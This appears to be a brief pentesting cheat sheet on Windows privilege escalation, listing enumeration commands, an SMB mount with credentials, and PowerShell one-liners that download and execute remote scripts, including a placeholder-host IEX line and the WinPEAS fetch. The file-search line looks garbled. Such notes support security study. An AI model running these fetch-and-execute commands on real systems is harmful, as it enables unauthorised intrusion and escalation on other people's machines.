Windows Privilege Escalation

System Enumeration

List Users

net user

User Privileges

whoami /priv

Search Files

If you dont know the full path of the file or even the extension, you can use: *<FILE>*

cmd /s <FILE>

List Recursive Directories (PowerShell)

ls . -Recurse -Force -Name -Filter "<filter>" | foreach { ls -for $_ }

net use z: \\<ip>\<share> /user:<user> <pass>

Execute Remote PowerShell Script

IEX(New-Object Net.WebClient).downloadString('http://<ip>/script.ps1')

WinPEAS

powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"

Last updated 1 month ago

System Enumeration

List Users

User Privileges

Search Files

List Recursive Directories (PowerShell)

Add SMB share to network drives

Execute Remote PowerShell Script

WinPEAS